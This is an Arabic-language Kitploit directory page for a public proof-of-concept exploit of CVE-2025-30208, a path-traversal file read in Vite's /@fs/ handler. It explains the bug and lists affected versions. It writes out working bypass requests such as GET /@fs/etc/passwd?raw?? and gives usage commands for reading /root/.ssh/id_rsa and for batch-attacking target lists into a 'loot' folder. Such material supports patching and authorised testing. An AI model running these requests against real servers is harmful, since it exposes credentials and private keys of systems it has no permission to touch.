Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-30208 — إثبات المفهوم (PoC) لسكربت الاستغلال لثغرة قراءة الملف التعسفي في Vite /@fs/ Path Traversal في transformMiddleware (CVE-2025-30208). | Kitploit
أدوات/GitHubGitHub/4xura/cve-2025-30208
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHub4xura/cve-2025-30208

CVE-2025-30208

إثبات المفهوم (PoC) لسكربت الاستغلال لثغرة قراءة الملف التعسفي في Vite /@fs/ Path Traversal في transformMiddleware (CVE-2025-30208).

عرض المستودع
10511منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-30208

برهان مفهوم لسكربت الاستغلال لثغرة قراءة الملفات التعسفية في Vite /@fs/ اجتياز المسار في transformMiddleware (CVE-2025-30208). يمكن الرجوع إلى التحليل المفصل في هذا المنشور.

الإصدارات المعرضة للخطر قبل:

  • 6.2.3
  • 6.1.2
  • 6.0.12
  • 5.4.15
  • 4.5.10

نظرة عامة

Vite هو مشروع مفتوح المصدر شائع يمكن الحصول عليه من Github والموقع الرسمي. يستخدم بادئة خاصة، @fs، للسماح بالوصول المباشر إلى مسارات الملفات المطلقة في وضع التطوير:

GET /@fs/<absolute/path/to/file>

ولكن لمنع سوء الاستخدام، يحد Vite ما يمكن الوصول إليه عبر @fs باستخدام إعداد مثل:

server: {
  fs: {
    allow: [path.resolve(__dirname, 'src')]
  }
}

لذا نظريًا، يجب حظر الملفات خارج الدليل المسموح به (مثل /etc/passwd) — حتى إذا حاول شخص استخدام حيل مثل ../../../.

ومع ذلك، يكمن الخلل في كيفية تحليل Vite لعناوين URL والتحقق منها (عبر الوسيطة/الوظيفة transformMiddleware). تستخدم الوسيطة/الوظيفة ensureServingAccess(url, ...) للتحقق مما إذا كان طلب الملف عبر /@fs/ مسموحًا به.

ومع ذلك، يمكن للمهاجم صياغة طلب باستخدام فواصل استعلام لاحقة في عنوان URL مثل:

GET /@fs/etc/passwd?raw??
GET /@fs/etc/passwd?raw&url
GET /@fs/etc/passwd?import&raw??

ستؤدي هذه الأشكال إلى تجاوز مرشحات التعبير العادي (rawRE, urlRE) وفحوصات الأمان بسبب سلسلة الاستعلام غير الصحيحة التي لا تزال تطابق منطق التوجيه. ما يحدث:

  1. المسار هو /@fs/../../../etc/passwd
  2. سلسلة الاستعلام هي raw?? (غير صحيحة عمدًا)
  3. داخليًا، يحاول Vite إزالة أو تطبيع الأحرف اللاحقة مثل ?، ويقوم بذلك قبل التحقق من مسموحية مسار الملف.
  4. ومع ذلك، يفشل الفحص في تحليل سلسلة الاستعلام ومطابقتها بشكل صحيح، لذلك لا يتم تطبيق منطق القائمة المسموح بها.

هذا يعني:

  • يتجاوز الطلب فحص server.fs.allow.
  • يعامله Vite كطلب وصول صحيح إلى ملف.
  • ويقرأ ويعيد ملفات عشوائية مثل /etc/passwd، إذا كانت موجودة.

استخدام برهان المفهوم

الاستخدام الأساسي

python3 poc.py [OPTIONS]

الخيارات

Flag / Optionالوصف
-u, --urlرابط الهدف الفردي (مثال: example.com:5173)
-f, --fileملف بقائمة الأهداف (رابط واحد لكل سطر)
-p, --pathمسار نظام الملفات للقراءة (الافتراضي: /etc/passwd)
-b, --bypassسلسلة استعلام لتجاوز التحقق من التوجيه (الافتراضي: ?raw??)
--proxyرابط الوكيل (مثال: http://127.0.0.1:8080)
-o, --outputدليل الإخراج لحفظ نتائج الاستغلال (الافتراضي: results)
-t, --threadsعدد الخيوط لوضع الدفعات (الافتراضي: 10)
-h, --helpإظهار رسالة المساعدة والخروج

أمثلة

هدف فردي:

python3 cve-2025-30208.py -u example.com:5173

هدف فردي بمسار LFI مخصص لتسريب الملف الذي نريده:

python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'

استغلال دفعات بأهداف متعددة:

python3 cve-2025-30208.py -f targets.txt

استعلام تجاوز مخصص:

python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"

استخدام وكيل (مثال: Burp Suite):

python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080

دليل إخراج مخصص:

python3 cve-2025-30208.py -u example.com:5173 -o ./loot

زيادة عدد الخيوط في وضع الدفعات:

python3 cve-2025-30208.py -f targets.txt -t 50
تنزيل الأداة